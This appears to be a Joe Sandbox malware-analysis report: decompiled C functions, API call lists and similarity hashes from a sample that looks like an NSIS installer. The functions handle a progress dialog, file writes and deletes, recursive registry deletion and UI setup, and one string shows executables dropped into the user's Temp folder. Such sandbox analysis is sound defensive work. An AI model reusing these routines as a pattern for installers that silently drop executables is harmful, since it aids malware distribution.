            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
            • String ID: ... %d%%
            • API String ID: 722711167-2449383134
            • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
            • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
            • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
            • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
            				long _v8;
            				signed char _v12;
            				unsigned int _v16;
            				void* _v20;
            				intOrPtr _v24;
            				long _v56;
            				void* _v60;
            				long _t15;
            				unsigned int _t19;
            				signed int _t25;
            				struct HWND__* _t28;
            
            				_t28 = _a4;
            				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
            				if(_a8 == 0) {
            					L4:
            					_v56 = _t15;
            					_v60 = 4;
            					SendMessageW(_t28, 0x113e, 0,  &_v60);
            					return _v24;
            				}
            				_t19 = GetMessagePos();
            				_v16 = _t19 >> 0x10;
            				_v20 = _t19;
            				ScreenToClient(_t28,  &_v20);
            				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
            				if((_v12 & 0x00000066) != 0) {
            					_t15 = _v8;
            					goto L4;
            				}
            				return _t25 | 0xffffffff;
            			}














            0x00404f93
            0x00404fa0
            0x00404fa6
            0x00404fe4
            0x00404fe4
            0x00404ff3
            0x00404ffa
            0x00000000
            0x00404ffc
            0x00404fa8
            0x00404fb7
            0x00404fbf
            0x00404fc2
            0x00404fd4
            0x00404fda
            0x00404fe1
            0x00000000
            0x00404fe1
            0x00000000

            APIs
            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
            • GetMessagePos.USER32 ref: 00404FA8
            • ScreenToClient.USER32 ref: 00404FC2
            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Message$Send$ClientScreen
            • String ID: f
            • API String ID: 41195575-1993550816
            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
            • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
            • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
            				short _v132;
            				void* _t11;
            				WCHAR* _t19;
            
            				if(_a8 == 0x110) {
            					SetTimer(_a4, 1, 0xfa, 0);
            					_a8 = 0x113;
            				}
            				if(_a8 == 0x113) {
            					_t11 = E00403012();
            					_t19 = L"unpacking data: %d%%";
            					if( *0x7a8ab0 == 0) {
            						_t19 = L"verifying installer: %d%%";
            					}
            					wsprintfW( &_v132, _t19, _t11);
            					SetWindowTextW(_a4,  &_v132);
            					SetDlgItemTextW(_a4, 0x406,  &_v132);
            				}
            				return 0;
            			}






            0x00402fa3
            0x00402fb1
            0x00402fb7
            0x00402fb7
            0x00402fc5
            0x00402fc7
            0x00402fd3
            0x00402fd8
            0x00402fda
            0x00402fda
            0x00402fe5
            0x00402ff5
            0x00403007
            0x00403007
            0x0040300f

            APIs
            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
            • wsprintfW.USER32 ref: 00402FE5
            • SetWindowTextW.USER32(?,?), ref: 00402FF5
            • SetDlgItemTextW.USER32 ref: 00403007
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Text$ItemTimerWindowwsprintf
            • String ID: unpacking data: %d%%$verifying installer: %d%%
            • API String ID: 1451636040-1158693248
            • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
            • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
            • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
            • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E00402950(void* __ebx) {
            				WCHAR* _t26;
            				void* _t29;
            				long _t37;
            				void* _t49;
            				void* _t52;
            				void* _t54;
            				void* _t56;
            				void* _t59;
            				void* _t60;
            				void* _t61;
            
            				_t49 = __ebx;
            				_t52 = 0xfffffd66;
            				_t26 = E00402DA6(0xfffffff0);
            				_t55 = _t26;
            				 *(_t61 - 0x40) = _t26;
            				if(E00405FB4(_t26) == 0) {
            					E00402DA6(0xffffffed);
            				}
            				E00406139(_t55);
            				_t29 = E0040615E(_t55, 0x40000000, 2);
            				 *(_t61 + 8) = _t29;
            				if(_t29 != 0xffffffff) {
            					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
            					if( *(_t61 - 0x28) != _t49) {
            						_t37 =  *0x7a8ab4;
            						 *(_t61 - 0x44) = _t37;
            						_t54 = GlobalAlloc(0x40, _t37);
            						if(_t54 != _t49) {
            							E004035FE(_t49);
            							E004035E8(_t54,  *(_t61 - 0x44));
            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
            							 *(_t61 - 0x10) = _t59;
            							if(_t59 != _t49) {
            								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
            								while( *_t59 != _t49) {
            									_t51 =  *_t59;
            									_t60 = _t59 + 8;
            									 *(_t61 - 0x3c) =  *_t59;
            									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
            									_t59 = _t60 +  *(_t61 - 0x3c);
            								}
            								GlobalFree( *(_t61 - 0x10));
            							}
            							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
            							GlobalFree(_t54);
            							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
            						}
            					}
            					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
            					CloseHandle( *(_t61 + 8));
            				}
            				_t56 = 0xfffffff3;
            				if(_t52 < _t49) {
            					_t56 = 0xffffffef;
            					DeleteFileW( *(_t61 - 0x40));
            					 *((intOrPtr*)(_t61 - 4)) = 1;
            				}
            				_push(_t56);
            				E00401423();
            				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
            				return 0;
            			}













            0x00402950
            0x00402952
            0x00402957
            0x0040295c
            0x0040295f
            0x00402969
            0x0040296d
            0x0040296d
            0x00402973
            0x00402980
            0x00402988
            0x0040298b
            0x00402997
            0x0040299a
            0x004029a0
            0x004029ae
            0x004029b3
            0x004029b7
            0x004029ba
            0x004029c3
            0x004029cf
            0x004029d3
            0x004029d6
            0x004029e0
            0x004029ff
            0x004029e7
            0x004029ec
            0x004029f4
            0x004029f7
            0x004029fc
            0x004029fc
            0x00402a06
            0x00402a06
            0x00402a13
            0x00402a19
            0x00402a1f
            0x00402a1f
            0x004029b7
            0x00402a33
            0x00402a35
            0x00402a35
            0x00402a3f
            0x00402a40
            0x00402a44
            0x00402a48
            0x00402a4e
            0x00402a4e
            0x00402a55
            0x004022f1
            0x00402c2d
            0x00402c39

            APIs
            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
            • GlobalFree.KERNEL32 ref: 00402A06
            • GlobalFree.KERNEL32 ref: 00402A19
            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Global$AllocFree$CloseDeleteFileHandle
            • String ID:
            • API String ID: 2667972263-0
            • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
            • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
            • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
            • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 48%
            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
            				void* _v8;
            				int _v12;
            				short _v536;
            				void* _t27;
            				signed int _t33;
            				intOrPtr* _t35;
            				signed int _t45;
            				signed int _t46;
            				signed int _t47;
            
            				_t46 = _a12;
            				_t47 = _t46 & 0x00000300;
            				_t45 = _t46 & 0x00000001;
            				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
            				if(_t27 == 0) {
            					if((_a12 & 0x00000002) == 0) {
            						L3:
            						_push(0x105);
            						_push( &_v536);
            						_push(0);
            						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
            							__eflags = _t45;
            							if(__eflags != 0) {
            								L10:
            								RegCloseKey(_v8);
            								return 0x3eb;
            							}
            							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
            							__eflags = _t33;
            							if(_t33 != 0) {
            								break;
            							}
            							_push(0x105);
            							_push( &_v536);
            							_push(_t45);
            						}
            						RegCloseKey(_v8);
            						_t35 = E00406A3B(3);
            						if(_t35 != 0) {
            							return  *_t35(_a4, _a8, _t47, 0);
            						}
            						return RegDeleteKeyW(_a4, _a8);
            					}
            					_v12 = 0;
            					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
            						goto L10;
            					}
            					goto L3;
            				}
            				return _t27;
            			}












            0x00402eb4
            0x00402ebd
            0x00402ec6
            0x00402ed2
            0x00402edb
            0x00402ee5
            0x00402f0a
            0x00402f10
            0x00402f15
            0x00402f16
            0x00402f46
            0x00402f1f
            0x00402f21
            0x00402f71
            0x00402f74
            0x00000000
            0x00402f7a
            0x00402f30
            0x00402f35
            0x00402f37
            0x00000000
            0x00000000
            0x00402f3f
            0x00402f44
            0x00402f45
            0x00402f45
            0x00402f52
            0x00402f5a
            0x00402f61
            0x00000000
            0x00402f8a
            0x00000000
            0x00402f69
            0x00402ef5
            0x00402f08
            0x00000000
            0x00000000
            0x00000000
            0x00402f08
            0x00402f90

            APIs
            • RegEnumValueW.ADVAPI32 ref: 00402EFD
            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CloseEnum$DeleteValue
            • String ID:
            • API String ID: 1354259210-0
            • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
            • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
            • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
            • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E00401D81(void* __ebx, void* __edx) {
            				struct HWND__* _t30;
            				WCHAR* _t38;
            				void* _t48;
            				void* _t53;
            				signed int _t55;
            				signed int _t60;
            				long _t63;
            				void* _t65;
            
            				_t53 = __ebx;
            				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
            				} else {
            					E00402D84(2);
            					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
            				}
            				_t55 =  *(_t65 - 0x24);
            				 *(_t65 + 8) = _t30;
            				_t60 = _t55 & 0x00000004;
            				 *(_t65 - 0x38) = _t55 & 0x00000003;
            				 *(_t65 - 0x18) = _t55 >> 0x1f;
            				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
            				if((_t55 & 0x00010000) == 0) {
            					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
            				} else {
            					_t38 = E00402DA6(0x11);
            				}
            				 *(_t65 - 0x44) = _t38;
            				GetClientRect( *(_t65 + 8), _t65 - 0x60);
            				asm("sbb esi, esi");
            				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
            				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
            				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
            					DeleteObject(_t48);
            				}
            				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
            					_push(_t63);
            					E004065B5();
            				}
            				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
            				return 0;
            			}











            0x00401d81
            0x00401d85
            0x00401d9a
            0x00401d87
            0x00401d89
            0x00401d8f
            0x00401d8f
            0x00401da0
            0x00401da3
            0x00401dad
            0x00401db0
            0x00401db8
            0x00401dc9
            0x00401dcc
            0x00401dd7
            0x00401dce
            0x00401dd0
            0x00401dd0
            0x00401ddb
            0x00401de5
            0x00401e0c
            0x00401e1b
            0x00401e29
            0x00401e31
            0x00401e39
            0x00401e39
            0x00401e42
            0x00401e48
            0x00402ba4
            0x00402ba4
            0x00402c2d
            0x00402c39

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
            • String ID:
            • API String ID: 1849352358-0
            • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
            • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
            • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
            • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E00401E4E(intOrPtr __edx) {
            				void* __edi;
            				int _t9;
            				signed char _t15;
            				struct HFONT__* _t18;
            				intOrPtr _t30;
            				void* _t31;
            				struct HDC__* _t33;
            				void* _t35;
            
            				_t30 = __edx;
            				_t33 = GetDC( *(_t35 - 8));
            				_t9 = E00402D84(2);
            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
            				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
            				ReleaseDC( *(_t35 - 8), _t33);
            				 *0x40ce08 = E00402D84(3);
            				_t15 =  *((intOrPtr*)(_t35 - 0x20));
            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
            				 *0x40ce0f = 1;
            				 *0x40ce0c = _t15 & 0x00000001;
            				 *0x40ce0d = _t15 & 0x00000002;
            				 *0x40ce0e = _t15 & 0x00000004;
            				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
            				_t18 = CreateFontIndirectW(0x40cdf8);
            				_push(_t18);
            				_push(_t31);
            				E004065B5();
            				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
            				return 0;
            			}











            0x00401e4e
            0x00401e59
            0x00401e5b
            0x00401e68
            0x00401e7f
            0x00401e84
            0x00401e91
            0x00401e96
            0x00401e9a
            0x00401ea5
            0x00401eac
            0x00401ebe
            0x00401ec4
            0x00401ec9
            0x00401ed3
            0x00402638
            0x0040156d
            0x00402ba4
            0x00402c2d
            0x00402c39

            APIs
            • GetDC.USER32(?), ref: 00401E51
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
            • ReleaseDC.USER32 ref: 00401E84
              • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
              • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
            • String ID:
            • API String ID: 2584051700-0
            • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
            • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
            • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
            • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E00401C43(intOrPtr __edx) {
            				int _t29;
            				long _t30;
            				signed int _t32;
            				WCHAR* _t35;
            				long _t36;
            				int _t41;
            				signed int _t42;
            				int _t46;
            				int _t56;
            				intOrPtr _t57;
            				struct HWND__* _t63;
            				void* _t64;
            
            				_t57 = __edx;
            				_t29 = E00402D84(3);
            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
            				 *(_t64 - 0x18) = _t29;
            				_t30 = E00402D84(4);
            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
            				 *(_t64 + 8) = _t30;
            				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
            					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
            				}
            				__eflags =  *(_t64 - 0x1c) & 0x00000002;
            				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
            					 *(_t64 + 8) = E00402DA6(0x44);
            				}
            				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
            				_push(1);
            				if(__eflags != 0) {
            					_t61 = E00402DA6();
            					_t32 = E00402DA6();
            					asm("sbb ecx, ecx");
            					asm("sbb eax, eax");
            					_t35 =  ~( *_t31) & _t61;
            					__eflags = _t35;
            					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
            					goto L10;
            				} else {
            					_t63 = E00402D84();
            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
            					_t41 = E00402D84(2);
            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
            					_t56 =  *(_t64 - 0x1c) >> 2;
            					if(__eflags == 0) {
            						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
            						L10:
            						 *(_t64 - 0x38) = _t36;
            					} else {
            						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
            						asm("sbb eax, eax");
            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
            					}
            				}
            				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
            				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
            					_push( *(_t64 - 0x38));
            					E004065B5();
            				}
            				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
            				return 0;
            			}















            0x00401c43
            0x00401c45
            0x00401c4c
            0x00401c4f
            0x00401c52
            0x00401c5c
            0x00401c60
            0x00401c63
            0x00401c6c
            0x00401c6c
            0x00401c6f
            0x00401c73
            0x00401c7c
            0x00401c7c
            0x00401c7f
            0x00401c83
            0x00401c85
            0x00401cda
            0x00401cdc
            0x00401ce7
            0x00401cf1
            0x00401cf4
            0x00401cf4
            0x00401cfd
